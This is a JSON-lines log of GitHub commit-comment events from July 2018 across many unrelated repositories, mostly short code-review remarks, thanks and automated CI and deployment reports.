{"id":"8025536623","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Community-Dark"},"payload":{"comment":{"id":29851182,"position":null,"line":null,"path":null,"commit_id":"5183c96d84e3fc08a797abe5dc7c41f6bf8d51bf","created_at":"2018-07-26T22:23:19Z","updated_at":"2018-07-26T22:23:19Z","author_association":"MEMBER","body":"neat ;) thanks :)"}},"created_at":"2018-07-26T22:23:19Z"}
{"id":"8025561868","type":"CommitCommentEvent","actor":{"login":"thisismike97"},"repo":{"name":"jgarff/rpi_ws281x"},"payload":{"comment":{"id":29851267,"position":null,"line":null,"path":null,"commit_id":"caa135d2216400c8f7d4aaff956ba5347a4463ef","created_at":"2018-07-26T22:30:25Z","updated_at":"2018-07-26T22:30:25Z","author_association":"NONE","body":"This doesnt seem to work for me, i still get the \"hardware revision not supported\" any ideas?"}},"created_at":"2018-07-26T22:30:25Z"}
{"id":"8025562505","type":"CommitCommentEvent","actor":{"login":"lyang9"},"repo":{"name":"LambdaSchool/Lambda-Hello"},"payload":{"comment":{"id":29851270,"position":null,"line":null,"path":null,"commit_id":"c9e39a659c49a1bf396f3af087c139f9afc06288","created_at":"2018-07-26T22:30:35Z","updated_at":"2018-07-26T22:30:35Z","author_association":"NONE","body":"PM: Jeremy Jones Extra Credit Challenge\r\n@crypto-jones"}},"created_at":"2018-07-26T22:30:35Z"}
{"id":"8025564909","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29851276,"position":null,"line":null,"path":null,"commit_id":"59ea6ca48c7ba5202ee14daa752709e02e5edbe1","created_at":"2018-07-26T22:31:16Z","updated_at":"2018-07-26T22:31:16Z","author_association":"NONE","body":"159313706_Issue#6796 (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2915 of 2948 tests passed, 148 test warnings)\n\nMessages:\n\n * 147 tests had: ESO small diffs.\n * 143 tests had: EIO diffs.\n * 108 tests had: MTR small diffs.\n * 81 tests had: Table small diffs.\n * 27 tests had: ESO big diffs.\n * 23 tests had: MTR big diffs.\n * 28 tests had: Table big diffs.\n * 8 tests had: ERR diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 649\n * Failed: 4\n\nregression Test Summary\n * Passed: 595\n * Failed: 29\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-59ea6ca48c7ba5202ee14daa752709e02e5edbe1-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-59ea6ca48c7ba5202ee14daa752709e02e5edbe1-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.88%25-yellow.png)</a> \n"}},"created_at":"2018-07-26T22:31:16Z"}
{"id":"8025566930","type":"CommitCommentEvent","actor":{"login":"minimucho1"},"repo":{"name":"bostonmak/ProjectNano2"},"payload":{"comment":{"id":29851280,"position":null,"line":null,"path":null,"commit_id":"533395102175dd1465131d0053b52631530d42f6","created_at":"2018-07-26T22:31:54Z","updated_at":"2018-07-26T22:31:54Z","author_association":"COLLABORATOR","body":"#84 "}},"created_at":"2018-07-26T22:31:54Z"}
{"id":"8025569321","type":"CommitCommentEvent","actor":{"login":"minimucho1"},"repo":{"name":"bostonmak/ProjectNano2"},"payload":{"comment":{"id":29851287,"position":null,"line":null,"path":null,"commit_id":"b27389ed07f8a229478dfe8ad455c4c08a0d00c8","created_at":"2018-07-26T22:32:36Z","updated_at":"2018-07-26T22:32:36Z","author_association":"COLLABORATOR","body":"#88 "}},"created_at":"2018-07-26T22:32:36Z"}
{"id":"8025575406","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29851296,"position":143,"line":376,"path":"lib/Backends/OpenCL/kernels_fwd_conv.cl","commit_id":"2301b6d317a83564be2cf1457b9e82d149356b63","created_at":"2018-07-26T22:34:24Z","updated_at":"2018-07-26T22:34:24Z","author_association":"NONE","body":"Let's not do it for now. Let's keep quantization specific snippets behind `#ifdef QUANTIZED`"}},"created_at":"2018-07-26T22:34:24Z"}
{"id":"8025591520","type":"CommitCommentEvent","actor":{"login":"fepegar"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":29851333,"position":5,"line":98,"path":"Modules/Loadable/Segmentations/Logic/vtkSlicerSegmentationGeometryLogic.h","commit_id":"673acf9fc06298c7100ee5947fc207e67a17bbea","created_at":"2018-07-26T22:39:13Z","updated_at":"2018-07-26T22:39:13Z","author_association":"NONE","body":"Actually I guess the most important bit was changing the tooltip of the GUI, rather than the comment in the code :)"}},"created_at":"2018-07-26T22:39:13Z"}
{"id":"8025593613","type":"CommitCommentEvent","actor":{"login":"Param453"},"repo":{"name":"JEMAutomation/ProdTest"},"payload":{"comment":{"id":29851337,"position":4,"line":190,"path":"JEMAutomationCode/Code/DE/rDEinfo_repro.cs","commit_id":"f39b091db692d5b18293fc6159c60c2299e2a428","created_at":"2018-07-26T22:39:53Z","updated_at":"2018-07-26T22:39:53Z","author_association":"CONTRIBUTOR","body":"Method Name should be Capitalized.."}},"created_at":"2018-07-26T22:39:53Z"}
{"id":"8025595952","type":"CommitCommentEvent","actor":{"login":"karlp"},"repo":{"name":"devanlai/libopencm3"},"payload":{"comment":{"id":29851344,"position":null,"line":null,"path":null,"commit_id":"6edeb57661a4889d5b202d0f774f3c13cee909d9","created_at":"2018-07-26T22:40:36Z","updated_at":"2018-07-26T22:40:36Z","author_association":"NONE","body":"I'm interested in it :) And there's nothing wrong with changing the number of control callbacks either :)  Leaving this comment here to hopefully have a deeper look at it later...."}},"created_at":"2018-07-26T22:40:36Z"}
{"id":"8025599020","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29851349,"position":null,"line":null,"path":null,"commit_id":"0a9d2229694b51d10eab9ac6d27dd7da747be555","created_at":"2018-07-26T22:41:33Z","updated_at":"2018-07-26T22:41:33Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-983](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-983).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-983-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-26T22:41:33Z"}
{"id":"8025599961","type":"CommitCommentEvent","actor":{"login":"Hexag0ny"},"repo":{"name":"Hexag0ny/hello-world"},"payload":{"comment":{"id":29851351,"position":null,"line":null,"path":null,"commit_id":"6506dc2bc94958db0c864cc908f1c1626275fe4c","created_at":"2018-07-26T22:41:51Z","updated_at":"2018-07-26T22:41:51Z","author_association":"OWNER","body":"."}},"created_at":"2018-07-26T22:41:51Z"}
{"id":"8025605534","type":"CommitCommentEvent","actor":{"login":"martyndykstra"},"repo":{"name":"pfsense/FreeBSD-ports"},"payload":{"comment":{"id":29851366,"position":null,"line":null,"path":null,"commit_id":"7c2caf5a2b8f4169832e30d03ab8987198f86bda","created_at":"2018-07-26T22:43:37Z","updated_at":"2018-07-26T22:43:37Z","author_association":"NONE","body":"I am available on IRC #pfSense (nickname martyndykstra), but not for long. I can confirm that an upgrade to the haproxy-devel package fixes the issue."}},"created_at":"2018-07-26T22:43:37Z"}
{"id":"8025606558","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29851368,"position":null,"line":null,"path":null,"commit_id":"31ae88af193e808018f1be3944f176dd7d43a072","created_at":"2018-07-26T22:43:57Z","updated_at":"2018-07-26T22:43:57Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-291](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-291).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-291-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-26T22:43:57Z"}
{"id":"8025611923","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29851376,"position":null,"line":null,"path":null,"commit_id":"9655ee264b3c2db52e7cf57fe0d73e331d2e9461","created_at":"2018-07-26T22:45:35Z","updated_at":"2018-07-26T22:45:35Z","author_association":"NONE","body":"159344647-Different-heat-transfer-algorithms-from-reverse-constructions (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2948 of 2948 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T22:45:35Z"}
{"id":"8025615242","type":"CommitCommentEvent","actor":{"login":"Mimic99"},"repo":{"name":"JSEcoin/server"},"payload":{"comment":{"id":29851386,"position":null,"line":null,"path":null,"commit_id":"d52d9acca41393964bec768e8a19dfc91b2db503","created_at":"2018-07-26T22:46:36Z","updated_at":"2018-07-26T22:46:36Z","author_association":"NONE","body":"How about sending all information in an encrypted package Where the salt and nonce is sent separatly. Use default encryptions But uglyfy the Client code so its hard to know What encryptionmethods are used. Just brainstorming. Keep up the good work :) if i remember correctly netent roulette had all kind of encryptions before sending the ”bet” to the server."}},"created_at":"2018-07-26T22:46:36Z"}
{"id":"8025615313","type":"CommitCommentEvent","actor":{"login":"jezhiggins"},"repo":{"name":"wmfs/statebox"},"payload":{"comment":{"id":29851387,"position":null,"line":null,"path":null,"commit_id":"97dab428cbdcb5032010e6130ecf3f68f155730d","created_at":"2018-07-26T22:46:38Z","updated_at":"2018-07-26T22:46:38Z","author_association":"CONTRIBUTOR","body":"TOP WORK!"}},"created_at":"2018-07-26T22:46:38Z"}
{"id":"8025616413","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29851388,"position":null,"line":null,"path":null,"commit_id":"c719291a3dd3389d762990a717e0c2f8e7ba5629","created_at":"2018-07-26T22:46:58Z","updated_at":"2018-07-26T22:46:58Z","author_association":"MEMBER","body":"I originally designed the legacy class to support null gateways. At current, only 1 server is used for skin uploads."}},"created_at":"2018-07-26T22:46:58Z"}
{"id":"8025619863","type":"CommitCommentEvent","actor":{"login":"alejandroarturom"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29851399,"position":null,"line":null,"path":null,"commit_id":"e27d9e4dcb94317ff1ba7d607b4f0dd2e8341e73","created_at":"2018-07-26T22:48:04Z","updated_at":"2018-07-26T22:48:04Z","author_association":"COLLABORATOR","body":"Weird. Because it is translated. \r\n<img width=\"572\" alt=\"screen shot 2018-07-26 at 6 46 41 pm\" src=\"https://user-images.githubusercontent.com/13737135/43292678-6bff80c6-9104-11e8-8b8d-45a70d21abb7.png\">\r\n"}},"created_at":"2018-07-26T22:48:04Z"}
{"id":"8025624622","type":"CommitCommentEvent","actor":{"login":"arousi"},"repo":{"name":"Timbwa/Zonk-Game"},"payload":{"comment":{"id":29851406,"position":43,"line":60,"path":"main.c","commit_id":"d103ef3e10b8cbe429f69110a23f8458275bb4b5","created_at":"2018-07-26T22:49:33Z","updated_at":"2018-07-26T22:49:33Z","author_association":"NONE","body":"`fflush()` behavior is not defined with `stdin`, you may use `__fpurge(stdin)` instead. It's also more memory efficient."}},"created_at":"2018-07-26T22:49:33Z"}
{"id":"8025624926","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29851407,"position":null,"line":null,"path":null,"commit_id":"c719291a3dd3389d762990a717e0c2f8e7ba5629","created_at":"2018-07-26T22:49:40Z","updated_at":"2018-07-26T22:49:40Z","author_association":"MEMBER","body":">I originally designed the legacy class to support null gateways.\r\n\r\nBut it... Didn't do anything if the gateway was null. You generated a failed completable with an exception implying that it shoudln't be used with a gateway of null."}},"created_at":"2018-07-26T22:49:40Z"}
{"id":"8025629867","type":"CommitCommentEvent","actor":{"login":"mariajoafana"},"repo":{"name":"loduque/ph-submissions"},"payload":{"comment":{"id":29851413,"position":null,"line":null,"path":null,"commit_id":"ac3c0ad2345725782ced6d48cb8d8b9b9beabb3b","created_at":"2018-07-26T22:51:13Z","updated_at":"2018-07-26T22:51:13Z","author_association":"NONE","body":"Ya se lo que pasó. Creaste un fork en tu propio repositorio con los cambios, pero la idea es hacer los cambios directamente en el repositorio de PH. Cómo te decía en el email cuéntame si te sale la opción de: \"Commit directly to the gh-pages branch\" "}},"created_at":"2018-07-26T22:51:13Z"}
{"id":"8025631940","type":"CommitCommentEvent","actor":{"login":"pimpmaneaton"},"repo":{"name":"pimpmaneaton/android_frameworks_base"},"payload":{"comment":{"id":29851417,"position":null,"line":null,"path":null,"commit_id":"7facfb00005f6d815e70bfc037d06c35f9acabd2","created_at":"2018-07-26T22:51:51Z","updated_at":"2018-07-26T22:51:51Z","author_association":"OWNER","body":"I am hoping for the possibility of having both. "}},"created_at":"2018-07-26T22:51:51Z"}
{"id":"8025632584","type":"CommitCommentEvent","actor":{"login":"utileetdulce"},"repo":{"name":"utileetdulce/Simulacrum"},"payload":{"comment":{"id":29851419,"position":null,"line":null,"path":null,"commit_id":"b71a174c915c7a9ead94d12be92a4005573c0fbf","created_at":"2018-07-26T22:52:04Z","updated_at":"2018-07-26T22:52:04Z","author_association":"OWNER","body":"added a link to the manual"}},"created_at":"2018-07-26T22:52:04Z"}
{"id":"8025639783","type":"CommitCommentEvent","actor":{"login":"rmselmi"},"repo":{"name":"rmselmi/simple-java-maven-app"},"payload":{"comment":{"id":29851434,"position":9,"line":11,"path":"README.md","commit_id":"0d85b7e1fd39bc6978511f92381aa10534ca4c1b","created_at":"2018-07-26T22:54:23Z","updated_at":"2018-07-26T22:54:23Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-26T22:54:23Z"}
{"id":"8025641431","type":"CommitCommentEvent","actor":{"login":"rmselmi"},"repo":{"name":"rmselmi/simple-java-maven-app"},"payload":{"comment":{"id":29851442,"position":null,"line":null,"path":null,"commit_id":"0d85b7e1fd39bc6978511f92381aa10534ca4c1b","created_at":"2018-07-26T22:54:55Z","updated_at":"2018-07-26T22:54:55Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-26T22:54:55Z"}
{"id":"8025642151","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29851443,"position":null,"line":null,"path":null,"commit_id":"cc0b878d1d923bf3190d1b66dad4bef6f585a604","created_at":"2018-07-26T22:55:09Z","updated_at":"2018-07-26T22:55:09Z","author_association":"MEMBER","body":"`TextureLoader.loadTexture(location, skinTexture)`"}},"created_at":"2018-07-26T22:55:09Z"}
{"id":"8025643775","type":"CommitCommentEvent","actor":{"login":"Smooved"},"repo":{"name":"Smooved/smooved.github.io"},"payload":{"comment":{"id":29851447,"position":null,"line":null,"path":null,"commit_id":"02ea72fbd2433bee24063cafa8bb8c51cc4f7f4d","created_at":"2018-07-26T22:55:40Z","updated_at":"2018-07-26T22:55:40Z","author_association":"OWNER","body":"update"}},"created_at":"2018-07-26T22:55:40Z"}
{"id":"8025648960","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29851463,"position":null,"line":null,"path":null,"commit_id":"cc0b878d1d923bf3190d1b66dad4bef6f585a604","created_at":"2018-07-26T22:57:20Z","updated_at":"2018-07-26T22:57:20Z","author_association":"MEMBER","body":"Oh yeah, completely forgot that existed."}},"created_at":"2018-07-26T22:57:20Z"}
{"id":"8025652617","type":"CommitCommentEvent","actor":{"login":"clydomino"},"repo":{"name":"djobiii2078/igamersInsights"},"payload":{"comment":{"id":29851472,"position":9,"line":9,"path":"DashBoardRequirements","commit_id":"2a447186ca735e614fd75b4d0805d9b9b3264746","created_at":"2018-07-26T22:58:29Z","updated_at":"2018-07-26T22:58:29Z","author_association":"COLLABORATOR","body":"select count(*) from lieu where type=`salle`"}},"created_at":"2018-07-26T22:58:29Z"}
{"id":"8025653016","type":"CommitCommentEvent","actor":{"login":"fanta228"},"repo":{"name":"StarSmasher44/Apollo-Gaming"},"payload":{"comment":{"id":29851473,"position":null,"line":null,"path":null,"commit_id":"93df3f833393e1942ca6661dc8fa0ef016807ad3","created_at":"2018-07-26T22:58:37Z","updated_at":"2018-07-26T22:58:37Z","author_association":"NONE","body":"Thank you, Laser. "}},"created_at":"2018-07-26T22:58:37Z"}
{"id":"8025655868","type":"CommitCommentEvent","actor":{"login":"amanjeev"},"repo":{"name":"sos-os/alarm"},"payload":{"comment":{"id":29851478,"position":15,"line":15,"path":"alarm-test/src/lib.rs","commit_id":"e1d03333e262c88c2abb59e6886dd20e007dea40","created_at":"2018-07-26T22:59:32Z","updated_at":"2018-07-26T22:59:32Z","author_association":"MEMBER","body":"Thank you so much! This is very very helpful."}},"created_at":"2018-07-26T22:59:32Z"}
{"id":"8025665005","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29851503,"position":null,"line":null,"path":null,"commit_id":"9655ee264b3c2db52e7cf57fe0d73e331d2e9461","created_at":"2018-07-26T23:02:21Z","updated_at":"2018-07-26T23:02:21Z","author_association":"NONE","body":"159344647-Different-heat-transfer-algorithms-from-reverse-constructions (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2948 of 2948 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T23:02:21Z"}
{"id":"8025665577","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29851505,"position":null,"line":null,"path":null,"commit_id":"c719291a3dd3389d762990a717e0c2f8e7ba5629","created_at":"2018-07-26T23:02:34Z","updated_at":"2018-07-26T23:02:34Z","author_association":"MEMBER","body":"And it only failed at upload.\n\nOn Thu, Jul 26, 2018, 6:49 PM ­Sollace <notifications@github.com> wrote:\n\n> I originally designed the legacy class to support null gateways.\n>\n> But it... Didn't do anything if the gateway was null. You generated a\n> failed completable with an exception implying that it shoudln't be used\n> with a gateway of null.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MineLittlePony/MineLittlePony/commit/c719291a3dd3389d762990a717e0c2f8e7ba5629#commitcomment-29851407>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADQIKg_SgBXNKzVQAz5Rhwz_obas0V2yks5uKkeEgaJpZM4ViqGM>\n> .\n>\n"}},"created_at":"2018-07-26T23:02:34Z"}
{"id":"8025667229","type":"CommitCommentEvent","actor":{"login":"kotwil52"},"repo":{"name":"kotwil52/mozilla"},"payload":{"comment":{"id":29851506,"position":24,"line":24,"path":"index-mdn.html","commit_id":"f51729dffd5b89cb1d57e9a5717c6c9ab6f961d6","created_at":"2018-07-26T23:03:06Z","updated_at":"2018-07-26T23:03:06Z","author_association":"OWNER","body":"hiper\r\n link\r\n"}},"created_at":"2018-07-26T23:03:06Z"}
{"id":"8025667676","type":"CommitCommentEvent","actor":{"login":"SkyFire"},"repo":{"name":"ProjectSkyfire/SkyFire.548"},"payload":{"comment":{"id":29851507,"position":null,"line":null,"path":null,"commit_id":"4106b86675e9ed39d8559f055c27d88bbd8ae7e1","created_at":"2018-07-26T23:03:16Z","updated_at":"2018-07-26T23:03:16Z","author_association":"MEMBER","body":"It's not complete"}},"created_at":"2018-07-26T23:03:16Z"}
{"id":"8025669846","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29851510,"position":null,"line":null,"path":null,"commit_id":"c719291a3dd3389d762990a717e0c2f8e7ba5629","created_at":"2018-07-26T23:03:57Z","updated_at":"2018-07-26T23:03:57Z","author_association":"MEMBER","body":"TBH I don't even know why you had a separate gateway url in the first place. Either way, it falls back to the same address now."}},"created_at":"2018-07-26T23:03:57Z"}
{"id":"8025670347","type":"CommitCommentEvent","actor":{"login":"JavierGoRa"},"repo":{"name":"Rolex-King/asteroids"},"payload":{"comment":{"id":29851511,"position":null,"line":null,"path":null,"commit_id":"953b34b0d895559cb36e92155cb9c483738ee4ad","created_at":"2018-07-26T23:04:07Z","updated_at":"2018-07-26T23:04:07Z","author_association":"NONE","body":"Te voy a mete un puro po culo\r\n"}},"created_at":"2018-07-26T23:04:07Z"}
{"id":"8025671229","type":"CommitCommentEvent","actor":{"login":"casperdcl"},"repo":{"name":"tqdm/tqdm"},"payload":{"comment":{"id":29851516,"position":null,"line":null,"path":null,"commit_id":"97a93932742db9e2c38672219a0aef8d1b3ad482","created_at":"2018-07-26T23:04:23Z","updated_at":"2018-07-26T23:04:23Z","author_association":"MEMBER","body":"1. Don't see how we could shorten the name without being vague.\r\n2. Can't make default due to seeming never resolvable warning (notebook frontends indistinguishable, as discussed in https://github.com/tqdm/tqdm/issues/443#issuecomment-393577945)"}},"created_at":"2018-07-26T23:04:23Z"}
{"id":"8025671269","type":"CommitCommentEvent","actor":{"login":"Mimic99"},"repo":{"name":"JSEcoin/server"},"payload":{"comment":{"id":29851517,"position":null,"line":null,"path":null,"commit_id":"4d0dcc19be7083fa4c92face3db827bf7425d11a","created_at":"2018-07-26T23:04:24Z","updated_at":"2018-07-26T23:04:24Z","author_association":"NONE","body":"James, Row 310: publisher difficulty is at 6 on the client, But if the script is modified to 4, it would pass here."}},"created_at":"2018-07-26T23:04:24Z"}
{"id":"8025674503","type":"CommitCommentEvent","actor":{"login":"cpshanley"},"repo":{"name":"MaxBazarov/exporter"},"payload":{"comment":{"id":29851523,"position":null,"line":null,"path":null,"commit_id":"9851093614f4d4eac955f0a2abff3fa1aca79c5d","created_at":"2018-07-26T23:05:30Z","updated_at":"2018-07-26T23:05:30Z","author_association":"NONE","body":"Cheers Max. I've sent you a couple of emails."}},"created_at":"2018-07-26T23:05:30Z"}
{"id":"8025676565","type":"CommitCommentEvent","actor":{"login":"rsmarples"},"repo":{"name":"rsmarples/openresolv"},"payload":{"comment":{"id":29851532,"position":null,"line":null,"path":null,"commit_id":"a694a49c41ffdc0e215320459af009d44482b065","created_at":"2018-07-26T23:06:11Z","updated_at":"2018-07-26T23:06:11Z","author_association":"OWNER","body":"resolvconf currently requires the getopt command.\r\n\r\nbusybox supports getopt - it's just not enabled by default for some reason.\r\nhttps://git.busybox.net/busybox/tree/util-linux/getopt.c\r\n\r\nAlternative, install the util-linux package as that ships with the getopt binary for shells without the builtin.\r\n\r\nresolvconf will only use /bin/sh, because that is guaranteed to be present on all OS's.\r\nNo BSD for example ships the base system with bash."}},"created_at":"2018-07-26T23:06:11Z"}
{"id":"8025677119","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29851533,"position":null,"line":null,"path":null,"commit_id":"c719291a3dd3389d762990a717e0c2f8e7ba5629","created_at":"2018-07-26T23:06:19Z","updated_at":"2018-07-26T23:06:19Z","author_association":"MEMBER","body":"Don't blame me for that design decision. This skin server api was here\nsince 1.7.10, and that is based off the older one from 1.4.\n\nOn Thu, Jul 26, 2018, 7:03 PM ­Sollace <notifications@github.com> wrote:\n\n> TBH I don't even know why you had a separate gateway url in the first\n> place. Either way, it falls back to the same address now.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MineLittlePony/MineLittlePony/commit/c719291a3dd3389d762990a717e0c2f8e7ba5629#commitcomment-29851510>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADQIKvU2M5DczRfxxg94rNEGcOmpibWoks5uKkrdgaJpZM4ViqGM>\n> .\n>\n"}},"created_at":"2018-07-26T23:06:19Z"}
{"id":"8025677145","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29851535,"position":null,"line":null,"path":null,"commit_id":"be020e7f6b72a14954306113ff142766238318ee","created_at":"2018-07-26T23:06:20Z","updated_at":"2018-07-26T23:06:20Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/be020e7f6b72a14954306113ff142766238318ee/index.html"}},"created_at":"2018-07-26T23:06:20Z"}
{"id":"8025681551","type":"CommitCommentEvent","actor":{"login":"jimvaughan"},"repo":{"name":"benjaminvaughan/itelescope"},"payload":{"comment":{"id":29851545,"position":44,"line":32,"path":"Encoder/encoder_class.py","commit_id":"ac464ec51a3ae27069a0e9182b6230de29113486","created_at":"2018-07-26T23:07:49Z","updated_at":"2018-07-26T23:07:49Z","author_association":"NONE","body":"self.z_state never gets set anywhere.  Did you mean to be testing level instead?  Is this the same as registering the callback to only look at rising or trailing edges?"}},"created_at":"2018-07-26T23:07:49Z"}
{"id":"8025681855","type":"CommitCommentEvent","actor":{"login":"jimvaughan"},"repo":{"name":"benjaminvaughan/itelescope"},"payload":{"comment":{"id":29851546,"position":39,"line":30,"path":"Encoder/encoder_class.py","commit_id":"ac464ec51a3ae27069a0e9182b6230de29113486","created_at":"2018-07-26T23:07:56Z","updated_at":"2018-07-26T23:07:56Z","author_association":"NONE","body":"Suggest a blank line here"}},"created_at":"2018-07-26T23:07:56Z"}
{"id":"8025682049","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29851547,"position":null,"line":null,"path":null,"commit_id":"919a9840a308233608b5407c76c050a9f11dbb6f","created_at":"2018-07-26T23:08:00Z","updated_at":"2018-07-26T23:08:00Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-1088](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-1088).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1088-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-26T23:08:00Z"}
{"id":"8025684434","type":"CommitCommentEvent","actor":{"login":"jimvaughan"},"repo":{"name":"benjaminvaughan/itelescope"},"payload":{"comment":{"id":29851555,"position":12,"line":12,"path":"Encoder/encoder_class.py","commit_id":"ac464ec51a3ae27069a0e9182b6230de29113486","created_at":"2018-07-26T23:08:49Z","updated_at":"2018-07-26T23:08:49Z","author_association":"NONE","body":"self.pi and pi are the same at this point"}},"created_at":"2018-07-26T23:08:49Z"}
{"id":"8025687656","type":"CommitCommentEvent","actor":{"login":"ivanlinares"},"repo":{"name":"snipe/snipe-it"},"payload":{"comment":{"id":29851560,"position":null,"line":null,"path":null,"commit_id":"ed78a4b8a01c9c15c726ee2d226510c6a4f3691a","created_at":"2018-07-26T23:09:45Z","updated_at":"2018-07-26T23:09:45Z","author_association":"NONE","body":"Thanks! 👍 "}},"created_at":"2018-07-26T23:09:45Z"}
{"id":"8025689553","type":"CommitCommentEvent","actor":{"login":"MRTHAKER"},"repo":{"name":"MRTHAKER/android_device_zuk_z2_plus"},"payload":{"comment":{"id":29851565,"position":null,"line":null,"path":null,"commit_id":"aa4408da5d0c3cec3405700f21fb2a0f6724d195","created_at":"2018-07-26T23:10:21Z","updated_at":"2018-07-26T23:10:21Z","author_association":"OWNER","body":"https://drive.google.com/open?id=1pp8azb7dcHkSS9H_meZ1rBNVlK7Ia-XE"}},"created_at":"2018-07-26T23:10:21Z"}
{"id":"8025689576","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29851566,"position":null,"line":null,"path":null,"commit_id":"384966069ab33be84e6addd8db40667689385520","created_at":"2018-07-26T23:10:21Z","updated_at":"2018-07-26T23:10:21Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 560](https://ci.hashicorp.engineering/viewLog.html?buildId=107286&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-26T23:10:21Z"}
{"id":"8025690407","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29851568,"position":null,"line":null,"path":null,"commit_id":"384966069ab33be84e6addd8db40667689385520","created_at":"2018-07-26T23:10:39Z","updated_at":"2018-07-26T23:10:39Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 560](https://ci.hashicorp.engineering/viewLog.html?buildId=107286&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:17"}},"created_at":"2018-07-26T23:10:39Z"}
